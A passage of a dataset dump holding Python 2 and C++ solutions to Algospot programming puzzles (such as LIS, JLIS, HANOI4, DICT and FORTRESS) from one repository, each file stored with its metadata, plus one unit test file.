dp(n, nxt, visited + (1<<nxt))\n cache[here][visited] = min(cache[here][visited], m)\n\n return cache[here][visited]\n\ndef solve(n):\n ret = sys.maxint\n for i in xrange(n):\n ret = min(ret, dp(n, i, 1<<i))\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n n = int(rl())\n graph = []\n cache = [[-1]*(2**n) for _ in xrange(n)]\n\n for i in xrange(n):\n input = map(float, rl().split())\n graph.append(input)\n\n print \"{:.10f}\".format(solve(n))\n" }, { "alpha_fraction": 0.5880281925201416, "alphanum_fraction": 0.6038732528686523, "avg_line_length": 16.212121963500977, "blob_id": "736ae54674a20c7860ca93cad66cc4099be4c6d1", "content_id": "d50f8a4666e50347890065c30c610f5a9af42d2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 568, "license_type": "no_license", "max_line_length": 53, "num_lines": 33, "path": "/LIS/LIS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ncache = []\nseq = None\ndef solve(sequence):\n\tglobal cache\n\tglobal seq\n\n\tseq = sequence\n\tn = len(seq)\n\tcache = [-1] * n\n\tfor i in xrange(n-1,-1,-1):\n\t\tlis(i)\n\treturn max(cache)\n\ndef lis(index):\n\tglobal seq\n\tif cache[index] != -1:\n\t\treturn cache[index]\n\n\tcache[index]= 1\n\tfor i in xrange(index+1,len(seq)):\n\t\tif seq[index] < seq[i]:\n\t\t\tcache[index] = max(cache[index], lis(i)+1)\n\n\treturn cache[index]\n\nif __name__ == \"__main__\":\n\trl = lambda: sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n\n\tfor _ in xrange(int(rl())):\n\t\trl()\n\t\tprint solve(map(int, rl().split()))\n" }, { "alpha_fraction": 0.5375722646713257, "alphanum_fraction": 0.5375722646713257, "avg_line_length": 27.83333396911621, "blob_id": "53b129d61234d98ee971be17fe8a0aab607f85aa", "content_id": "2589d19c3ff1a9b4d1544ac6045e888c20f5139b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/LECTURE/LECTURE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport re\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n print \"\".join(sorted(re.findall('..', rl())))\n" }, { "alpha_fraction": 0.5096085667610168, "alphanum_fraction": 0.5138790011405945, "avg_line_length": 22.41666603088379, "blob_id": "d9f96d4795a66c2e97a1ba4a55fa41e66971d40e", "content_id": "4c14d138cb408b58cd2c20e78d1a56e03b50c52d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 65, "num_lines": 60, "path": "/XORNECKLACE/XORNECKLACE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\n# XOR has always positive value\n# So, Maximum is always using full-length necklace\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n N = int(rl())\n necklace = map(int, rl().split())\n ret = 0\n for i in xrange(len(necklace)):\n ret += necklace[i-1]^necklace[i]\n\n print ret\n\n# Below anser is dynamic programing solution\n# But, memory limit exceeded because cache\n#\n# necklace = None\n# cache = None\n#\n# def solve(visited):\n# t = tuple(visited)\n# if t in cache:\n# return cache[t]\n#\n#\n# bead_list = []\n# for i in xrange(len(visited)):\n# if visited[i]:\n# bead_list.append(i)\n#\n# if len(bead_list) == 1:\n# return 0\n#\n# ret = 0\n# for i in xrange(len(bead_list)):\n# ret += necklace[bead_list[i-1]]^necklace[bead_list[i]]\n#\n# for i in xrange(len(visited)):\n# if visited[i]:\n# visited[i] = False\n# ret = max(ret, solve(visited))\n# visited[i] = True\n#\n# cache[t] = ret\n# return ret\n#\n# if __name__ == \"__main__\":\n# rl = lambda : sys.stdin.readline()\n#\n# for _ in xrange(int(rl())):\n# N = int(rl())\n# necklace = map(int, rl().split())\n# visited = [True] * len(necklace)\n# cache = dict()\n# print solve(visited)\n# print cache\n" }, { "alpha_fraction": 0.4284304082393646, "alphanum_fraction": 0.45804542303085327, "avg_line_length": 20.10416603088379, "blob_id": "ad7ce174381bc9848c151b598196a63893e11830", "content_id": "84dee4b1afff8ddee2b9e39300263384b325207b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 82, "num_lines": 48, "path": "/PI/PI.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef decision(str):\n n = len(str)\n if [str[0]]*n == str:\n return 1\n\n diff = str[0] - str[1]\n progressive = True\n for i in xrange(n-1):\n if diff != str[i] - str[i+1]:\n progressive = False\n break\n\n if progressive:\n if abs(diff) == 1:\n return 2\n else:\n return 5\n\n for i in xrange(n):\n if str[i] != str[i%2]:\n return 10\n\n return 4\n\n\ndef solve(PI):\n n = len(PI)\n cache = [sys.maxint] * (n)\n cache[2] = decision(PI[0:3])\n cache[3] = decision(PI[0:4])\n cache[4] = decision(PI[0:5])\n\n for i in xrange(3,n):\n try:\n for j in xrange(3,6):\n if i-j >= 0:\n cache[i] = min(decision(PI[i-j+1:i+1]) + cache[i-j], cache[i])\n except:\n continue\n print cache[-1]\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n\n for _ in xrange(int(rl())):\n solve(map(int,list(rl())))\n" }, { "alpha_fraction": 0.41695383191108704, "alphanum_fraction": 0.43487250804901123, "avg_line_length": 24.910715103149414, "blob_id": "3af812702b22e684353f0bb242baac477d727c92", "content_id": "36f37d0588497f95d365a1a70f2ae68250d259e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1451, "license_type": "no_license", "max_line_length": 57, "num_lines": 56, "path": "/ENCODING/ENCODING.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\n\ndef solve(r, c, s):\n bin_list = \"\"\n for char in s:\n if char == \" \":\n bin_list += \"00000\"\n else:\n bin_list += \"{:05b}\".format(ord(char)-64)\n\n pos = 0\n direction = 0\n dir_list = [1, c,-1, -c]\n ret = [-1]*(r*c)\n try:\n for i in xrange(len(bin_list)):\n ret[pos] = bin_list[i]\n pos += dir_list[direction]\n need_change_dir = False\n\n # Case : Visit string at matrix outside\n if direction == 0 and pos == c:\n need_change_dir = True\n elif direction == 1 and pos >= r*c:\n need_change_dir = True\n # Case : Visit already visted string\n elif ret[pos] != -1:\n need_change_dir = True\n\n if need_change_dir:\n pos -= dir_list[direction]\n direction = (direction+1)%4\n pos += dir_list[direction]\n except:\n return \"0\"\n\n for i in xrange(len(ret)):\n if ret[i] == -1:\n ret[i] = \"0\"\n\n return \"\".join(ret)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n for i in xrange(int(rl())):\n input = rl()\n # for i in xrange(len(input)):\n try:\n r, c, s = input.split(' ', 2)\n except:\n r, c = input.split(' ', 2)\n s = \"\"\n\n r, c = int(r), int(c)\n print i+1, solve(r, c, s)\n" }, { "alpha_fraction": 0.458781361579895, "alphanum_fraction": 0.47311827540397644, "avg_line_length": 22.25, "blob_id": "4668a42fea619ea81fa4b864ff73b0174570782d", "content_id": "0ae4d10f13ab68b4ec8cd87016229ba7b48dc506", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/MISPELL/MISPELL.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n d = []\n for _ in xrange(int(rl())):\n input = rl().split()\n n, str = int(input[0]), input[1]\n d.append(str[:n-1]+str[n:])\n\n for i, v in enumerate(d):\n print i+1, v\n" }, { "alpha_fraction": 0.3533487319946289, "alphanum_fraction": 0.37505772709846497, "avg_line_length": 18.862384796142578, "blob_id": "1080b5b9b189598f918efb51323ad15c234bca67", "content_id": "28bdeb8daabf7268b4614b5f22eca15d0b5f182b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2165, "license_type": "no_license", "max_line_length": 69, "num_lines": 109, "path": "/HANOI4/HANOI4.cpp", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <queue>\n#include <cstring>\n#include <cmath>\n#include <sstream>\n\nusing namespace std;\n\nconst int MAX_DISCS = 12;\nint c[1<<(MAX_DISCS*2)];\n\nint get(int state, int index) {\n return (state >> ( index *2)) & 3;\n}\n\nint set(int state, int index, int value) {\n return value << (index*2) | (state & ~(3 << (index*2)));\n}\n\nint inc(int x) {\n if(x < 0)\n return x-1;\n else\n return x+1;\n}\n\nint sgn(int x) {\n if(!x)\n return 0;\n return x> 0? 1: -1;\n}\n\nint solve(int discs, int begin) {\n int end = 0;\n for(int i=0; i< discs; ++i) {\n end = set(end, i, 3);\n }\n\n if(end == begin)\n return 0;\n\n queue<int> q;\n memset(c,0,sizeof(c));\n\n q.push(begin);\n q.push(end);\n c[begin] = 1;\n c[end] = -1;\n\n while (!q.empty()){\n int parent = q.front();\n q.pop();\n int top[4] = {-1,-1,-1,-1};\n for (int i = discs-1; i >= 0; i--) {\n top[get(parent,i)] = i;\n }\n\n\n for(int i =0; i< 4; i++){\n if(top[i] != -1) {\n for(int j = 0; j<4; j++) {\n if (i == j)\n continue;\n\n if (top[j] == -1 || top[i] < top[j] ) {\n int child = set(parent,top[i],j);\n if(c[child] == 0) {\n q.push(child);\n c[child] = inc(c[parent]);\n }\n else if (c[child] * c[parent] < 0){\n return abs(c[child]) + abs(c[parent]) -1;\n }\n\n }\n }\n }\n }\n }\n\n return -1;\n\n}\n\nint main(){\n int cases;\n cin >> cases;\n while(cases--) {\n int discs = 0, begin = 0;\n cin >> discs;\n cin.get();\n for (int i =0; i < 4; i++) {\n string s;\n int n = 0;\n\n getline(cin, s);\n stringstream ss(s);\n\n ss >> n;\n while (ss >> n) {\n begin = set(begin, n-1, i);\n }\n }\n\n cout<<solve(discs, begin)<<endl;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.40051019191741943, "alphanum_fraction": 0.42517006397247314, "avg_line_length": 26.67058753967285, "blob_id": "a4ab5e5deec3e85ae3b13840958a5751d0275759", "content_id": "0aef460acc442dc159d318153ee7e19de57b7d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2352, "license_type": "no_license", "max_line_length": 89, "num_lines": 85, "path": "/FORTRESS/FORTRESS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport operator\n\n# Calculate distance between 2 nodes\ndef dist_node(tree, a, b):\n if a == b:\n return -1\n\n ret = 0\n # Always depth of a is bigger than depth of b\n if tree[a][1] < tree[b][1]:\n a, b = b, a\n\n a_depth = tree[a][1]\n b_depth = tree[b][1]\n while a_depth != b_depth:\n a = tree[a][0]\n a_depth = tree[a][1]\n ret += 1\n\n while a != b:\n a = tree[a][0]\n b = tree[b][0]\n ret += 2\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n\n for _ in xrange(int(rl())):\n n = int(rl())\n walls = [None]*n\n tree = [[0,0] for _ in xrange(n)]\n for i in xrange(n):\n input = map(int, rl().split())\n walls[i] = input[2], input[0], input[1]\n\n if n < 4:\n print n-1\n continue\n\n # Make a tree : [parent, depth]\n walls = sorted(walls, reverse=True)\n leaf_nodes = [True]*n\n for i in xrange(n):\n for j in xrange(i+1, n):\n dist = ((walls[i][1]-walls[j][1])**2 + (walls[i][2]-walls[j][2])**2)**0.5\n if walls[i][0] >= dist + walls[j][0]:\n leaf_nodes[i] = False\n tree[j][0] = i\n tree[j][1] += 1\n\n leaf_nodes = [i for i in xrange(n) if leaf_nodes[i]]\n # print dist_node(tree, leaf_nodes[0],leaf_nodes[1])\n\n ret = 0\n for i in xrange(len(leaf_nodes)):\n for j in xrange(i+1, len(leaf_nodes)):\n ret = max(ret, dist_node(tree, leaf_nodes[i], leaf_nodes[j]))\n\n print ret\n #\n #\n # d = dict()\n # for i in xrange(n-1,0,-1):\n # parent = tree[i][0]\n # if parent == 0:\n # if not i in d:\n # d[i] = 1\n # continue\n #\n # while tree[parent][0] != 0:\n # parent = tree[parent][0]\n #\n # if parent in d:\n # d[parent] = max(d[parent], tree[i][1])\n # else:\n # d[parent] = tree[i][1]\n #\n # result = sorted(d.items(), key=operator.itemgetter(1), reverse=True)\n # if len(result) == 1:\n # print result[0][1]\n # else:\n # print result[0][1] + result[1][1]\n" }, { "alpha_fraction": 0.6106870174407959, "alphanum_fraction": 0.6633588075637817, "avg_line_length": 41.25806427001953, "blob_id": "a7ec854a2d22c02267446c828de8cbeefb7db7e9", "content_id": "087b59aa8ab86cd86b0430f3d8c358261c448d7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 211, "num_lines": 31, "path": "/DICT/DICT_test.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import unittest\nimport DICT as test\n\nclass Test_DICT(unittest.TestCase):\n def test_default_case(self):\n self.assertEqual(test.solve(5, 2, 11), 'abaaaab')\n self.assertEqual(test.solve(5, 6, 17), 'aaabbabbbab')\n self.assertEqual(test.solve(1, 1, 2), 'ba')\n self.assertEqual(test.solve(4, 0, 2), 'NONE')\n\n def test_zero_case(self):\n self.assertEqual(test.solve(0, 0, 2), 'NONE')\n self.assertEqual(test.solve(0, 0, 1), 'NONE')\n self.assertEqual(test.solve(0, 1, 1), 'b')\n self.assertEqual(test.solve(1, 0, 1), 'a')\n\n def test_maximum_case(self):\n self.assertEqual(test.solve(1, 1, 2), 'ba')\n self.assertEqual(test.solve(5, 2, 21), 'bbaaaaa')\n self.assertEqual(test.solve(10, 10, 184756), 'bbbbbbbbbbaaaaaaaaaa')\n self.assertEqual(test.solve(100, 100, 100000000),\n 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbabbbbbbbbbbabbbbbbbbbbbbbbbbbbbbbbbbbbbba')\n\n def test_exceed_case(self):\n self.assertEqual(test.solve(1, 1, 3), 'NONE')\n self.assertEqual(test.solve(2, 1, 4), 'NONE')\n self.assertEqual(test.solve(5, 5, 253), 'NONE')\n\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.4426395893096924, "alphanum_fraction": 0.46395939588546753, "avg_line_length": 21.9069766998291, "blob_id": "a0fd0a27d29c35f3a8250c87910c1f8733723443", "content_id": "130eae31b270e71b28016530b47063986074a45c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 985, "license_type": "no_license", "max_line_length": 55, "num_lines": 43, "path": "/BRAVEDUCK/BRAVEDUCK.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport math\nimport gc\nimport collections\n\ndef solve(jump, start, end, bridge):\n jump = jump**2\n q = collections.deque()\n q.append(start)\n\n visited = [False] * len(bridge)\n\n while q:\n x1, y1 = q.pop()\n for idx, value in enumerate(bridge):\n if visited[idx]:\n continue\n\n x2 = value[0]\n y2 = value[1]\n\n if jump >= (end[0]-x1)**2 + (end[1]-y1)**2:\n return 'YES'\n\n if jump >= (x1-x2)**2 + (y1-y2)**2:\n visited[idx] = True\n q.append((x2,y2))\n\n return 'NO'\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n jump = int(rl())\n start = map(int, rl().split())\n end = map(int, rl().split())\n bridge = []\n for _ in xrange(int(rl())):\n x,y = map(int, rl().split())\n bridge.append((x,y))\n\n print solve(jump, start, end, bridge)\n" }, { "alpha_fraction": 0.5563991069793701, "alphanum_fraction": 0.5780910849571228, "avg_line_length": 19.44444465637207, "blob_id": "fa41d231ef53201483fb214052e35e4982ca97d7", "content_id": "af3f5143a0caf62dd7e483e8c94d69979319fdd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 922, "license_type": "no_license", "max_line_length": 69, "num_lines": 45, "path": "/JUMPGAME/JUMPGAME.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nclass JumpGame():\n\tdef __init__(self, matrix):\n\t\tself.n = len(matrix[0])\n\t\tself.cache = [[-1 for _ in xrange(self.n)] for _ in xrange(self.n)]\n\t\tself.matrix = matrix\n\n\tdef solve(self):\n\t\tret = self.jump(0,0)\n\t\tif ret is 1:\n\t\t\treturn 'YES'\n\t\telse:\n\t\t\treturn 'NO'\n\n\tdef jump(self, y, x):\n\t\tn = self.n\n\t\tif y is n-1 and x is n-1:\n\t\t\treturn 1\n\t\tif y >= n or x >= n:\n\t\t\treturn 0\n\t\tif self.cache[y][x] != -1:\n\t\t\treturn self.cache[y][x]\n\n\t\tjumpSize = self.matrix[y][x]\n\t\tl = self.jump(y+jumpSize, x)\n\t\tr = self.jump(y,x+jumpSize)\n\n\t\tif l is 0 and r is 0:\n\t\t\tself.cache[y][x] = 0\n\t\telse:\n\t\t\tself.cache[y][x] = 1\n\n\t\treturn self.cache[y][x]\n\n\nif __name__ == \"__main__\":\n\tsys.setrecursionlimit(10000)\n\trl = lambda: sys.stdin.readline()\n\tfor _ in xrange(int(rl())):\n\t\tmatrix = []\n\t\tfor _ in xrange(int(rl())):\n\t\t\tmatrix.append(map(int,rl().rstrip(' \\t\\r\\n\\0').split(' ')))\n\t\ttest = JumpGame(matrix)\n\t\tprint test.solve()\n\n\n" }, { "alpha_fraction": 0.4288793206214905, "alphanum_fraction": 0.4579741358757019, "avg_line_length": 20.581396102905273, "blob_id": "0af1adf1bfe0cdd52c5da24a8e4c8d5ef5d60fb1", "content_id": "cc97f69b148d3abc788a37bfc3480c42f1dc4f8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 59, "num_lines": 43, "path": "/JLIS/JLIS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ncache = [[-1] * 101 for _ in xrange(101)]\n\ndef get_max_item(i, j):\n if i is -1:\n a = -sys.maxint\n else:\n a = A[i]\n if j is -1:\n b = -sys.maxint\n else:\n b = B[j]\n return max(a, b)\n\n\ndef jlis(i, j):\n if cache[i+1][j+1] != -1:\n return cache[i+1][j+1]\n\n max_item = get_max_item(i, j)\n ret = 2\n for next_i in xrange(i+1, len(A)):\n if max_item < A[next_i]:\n ret = max(ret, jlis(next_i, j)+1)\n\n for next_j in xrange(j+1, len(B)):\n if max_item < B[next_j]:\n ret = max(ret, jlis(i, next_j)+1)\n\n cache[i+1][j+1] = ret\n return ret\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n global A, B\n for _ in xrange(int(rl())):\n rl()\n A = map(int, rl().split())\n B = map(int, rl().split())\n cache = [[-1]*(len(B)+1) for _ in xrange(len(A)+1)]\n print(jlis(-1, -1)-2)\n" }, { "alpha_fraction": 0.46507352590560913, "alphanum_fraction": 0.4852941036224365, "avg_line_length": 22.65217399597168, "blob_id": "081675cf039322969de30c79fd4eeb7f90bf8bc2", "content_id": "5458971a5ca37f98e0bd948fe38bbfa05b1bf024", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 81, "num_lines": 46, "path": "/BRACKETS/BRACKETS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nd = {'[': ']', '(':')'}\ncache = [[-1]*101 for _ in xrange(101)]\nbrackets = None\n\ndef solve(start, end):\n if start >= end:\n return 0\n\n if cache[start][end] != -1:\n return cache[start][end]\n\n ret = 0\n if brackets[start] == \"(\" or brackets[start] == \"[\":\n s_point = start+1\n while True:\n try :\n next_index = brackets.index(d[brackets[start]], s_point, end+1)\n except :\n break\n\n ret_sub = 2 + solve(start+1, next_index-1) + solve(next_index+1, end)\n ret = max(ret, ret_sub)\n s_point = next_index+1\n\n ret = max(ret, solve(start+1, end))\n else:\n ret = solve(start+1, end)\n\n cache[start][end] = ret\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n while True:\n brackets = rl().rstrip()\n\n if brackets == \"end\":\n break\n\n for i in xrange(len(brackets)):\n for j in xrange(len(brackets)):\n cache[i][j] = -1\n\n print solve(0, len(brackets)-1)\n" }, { "alpha_fraction": 0.5265700221061707, "alphanum_fraction": 0.5603864789009094, "avg_line_length": 23.352941513061523, "blob_id": "240751052ac47e02804a76cdc33dd0dfd692511e", "content_id": "ba07bfa3a73a5e22e7a75dca01c18f2ffecd1db4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 414, "license_type": "no_license", "max_line_length": 72, "num_lines": 17, "path": "/TILING2/TILING2.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom math import factorial\n\n\ndef solve(n):\n combination = lambda n, r : factorial(n)/factorial(n-r)/factorial(r)\n x, y = divmod(n,2)\n ret = 0\n for i in xrange(x+1):\n ret += combination(n-i,i)\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n = int(rl())\n print solve(n) % 1000000007\n" }, { "alpha_fraction": 0.44387754797935486, "alphanum_fraction": 0.4719387888908386, "avg_line_length": 18.600000381469727, "blob_id": "f52278fbd2b97a06c51f5c0da0859f25453a8b5f", "content_id": "fc46cddad3c45a2e01297dfeb8322399a65a331d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/ENDIANS/ENDIANS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef trans_order(n):\n x, y = divmod(n, 8)\n ret = 31 - (8*x)\n ret += -7 + y\n\n return ret\n\ndef solve(n):\n ret = 0\n for i in xrange(32):\n if n & (1<<i):\n ret += (1 << trans_order(i))\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n print solve(int(rl()))\n" }, { "alpha_fraction": 0.427238792181015, "alphanum_fraction": 0.46641790866851807, "avg_line_length": 30.52941131591797, "blob_id": "c7dc2ab86d899b2c23efb990c5a51188ea499238", "content_id": "6a00f78d207ebbe4c289b41ae46e2903c6af4a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 79, "num_lines": 34, "path": "/FOURGODS/FOURGODS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom collections import defaultdict\n\ndef solve(v, e, graph):\n ret = 0\n for start in xrange(v):\n paths = [[0]*v for i in xrange(3)]\n paths[0][start] = 1\n for i in xrange(1,3):\n for j in xrange(v):\n if paths[i-1][j] != 0:\n for k in xrange(v):\n if graph[j][k]:\n paths[i][k] += paths[i-1][j]\n\n for i in xrange(start+1, v):\n if paths[2][i] > 1:\n # Select 2nd, 4th points and then divide 2 because of non-order\n ret += paths[2][i]*(paths[2][i]-1)/2\n\n # Divide 2 because 1st, 3rd points are non-order\n return (ret/2) % 20130728\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n v, e = map(int, rl().split())\n graph = [[False]*v for _ in xrange(v)]\n for _ in xrange(e):\n v1, v2 = map(int, rl().split())\n graph[v1-1][v2-1] = True\n graph[v2-1][v1-1] = True\n\n print solve(v, e, graph)\n" }, { "alpha_fraction": 0.4466463327407837, "alphanum_fraction": 0.46417683362960815, "avg_line_length": 20.866666793823242, "blob_id": "408f9669669ab18cb8b22768a993371c0541acd8", "content_id": "ca120371441ddfec2d12ae7f7f3ff35ab1219022", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1312, "license_type": "no_license", "max_line_length": 80, "num_lines": 60, "path": "/DICT/DICT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom math import factorial\n\nnum_combination = lambda n, m: factorial(n) / factorial(abs(n-m)) / factorial(m)\ndef get_order(N,M,K):\n cosum = 1\n zero_select = 1\n for i in xrange(M, N+M):\n calc = num_combination(i, zero_select)\n zero_select += 1\n if cosum + calc >= K:\n return K-cosum, i\n\n cosum += calc\n return None\n\ndef solve(N,M,K):\n if N == 0 and M == 0:\n return \"NONE\"\n\n if N == 0 or M == 0:\n if K == 1:\n return \"a\"*N+\"b\"*M\n else:\n return \"NONE\"\n\n if num_combination(N+M,M) < K:\n return \"NONE\"\n\n n, m, k = N, M, K\n orders = [0]\n\n if k == 1:\n for i in xrange(M):\n orders.append(i)\n\n while k > 1 and n > 0 and m > 0 :\n # Get start point of 1 and remain k\n order = get_order(n,m,k)\n orders.append(order[1])\n k = order[0]\n n -= order[1] - orders[-1]\n m -= 1\n\n if k == 1 and m > 0:\n for i in xrange(m):\n orders.append(i)\n\n ret = [\"a\"]*(N+M)\n for i in orders[1:]:\n ret[-i-1] = \"b\"\n\n return \"\".join(ret)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n N, M, K = map(int, rl().split())\n print solve(N, M, K)\n" }, { "alpha_fraction": 0.3945578336715698, "alphanum_fraction": 0.4263038635253906, "avg_line_length": 31.66666603088379, "blob_id": "5e9a4d262b44c957a2e17aa6fa9381fe21112a2d", "content_id": "24fca727399fd067e3ff2c16fbbf9538a66f562a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 882, "license_type": "no_license", "max_line_length": 76, "num_lines": 27, "path": "/XHAENEUNG/XHAENEUNG.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nstr_to_int = {\"zero\":0, \"one\":1, \"two\":2, \"three\":3, \"four\":4,\\\n \"five\":5, \"six\":6, \"seven\":7, \"eight\":8, \"nine\":9, \"ten\":10}\nint_to_str = {0:'zero', 1:'one', 2:'two', 3:'three', 4:'four', \\\n 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine', 10:'ten'}\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n x, oper, y, _, result = rl().split()\n\n if oper == \"+\":\n ret = str_to_int[x] + str_to_int[y]\n elif oper == \"-\":\n ret = str_to_int[x] - str_to_int[y]\n elif oper == \"*\":\n ret = str_to_int[x] * str_to_int[y]\n\n if not (0<=ret<=10):\n print \"No\"\n continue\n \n if sorted(int_to_str[ret]) == sorted(result):\n print \"Yes\"\n else:\n print \"No\"\n" }, { "alpha_fraction": 0.39605462551116943, "alphanum_fraction": 0.41729894280433655, "avg_line_length": 26.45833396911621, "blob_id": "fa98f2b259f3f84bf8cea7ebcf099a19cdf9ec81", "content_id": "348e719ce0ec05fa39945e9c1a8c33a956f679bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 659, "license_type": "no_license", "max_line_length": 48, "num_lines": 24, "path": "/DIAMONDPATH/DIAMONDPATH.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n n = int(rl())\n ret = [0]*n\n ret[0] = int(rl())\n\n for i in xrange(n-1):\n input = map(int, rl().split())\n input[0] += ret[0]\n input[-1] += ret[len(input)-2]\n for j in xrange(1, len(input)-1):\n input[j] += max(ret[j-1],ret[j])\n ret = input\n\n for i in xrange(n,1,-1):\n input = map(int, rl().split())\n for j in xrange(len(input)):\n input[j] += max(ret[j],ret[j+1])\n ret = input\n\n print ret[0]\n" }, { "alpha_fraction": 0.36026936769485474, "alphanum_fraction": 0.4511784613132477, "avg_line_length": 20.214284896850586, "blob_id": "d3c4c318d1b937f60df5fa9d456b011017a91fd0", "content_id": "6b8099b9e1d0eab3dcd042827a251c919bcbba36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/BALLPAINTING/BALLPAINTING.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n case = [0]*1001\n case[1] = 2\n for i in xrange(2, 1001):\n case[i] = (case[i-1]*4*(2*i-1)) % 1000000007\n\n while(True):\n n = int(rl())\n if n == 0:\n break\n print(case[n])\n" }, { "alpha_fraction": 0.4215456545352936, "alphanum_fraction": 0.44184231758117676, "avg_line_length": 25.6875, "blob_id": "fd6462c6fd853de44b0f621d698490583033d5da", "content_id": "ee1dcddee293f145e4adca2b6b60afa06ec41c82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1281, "license_type": "no_license", "max_line_length": 58, 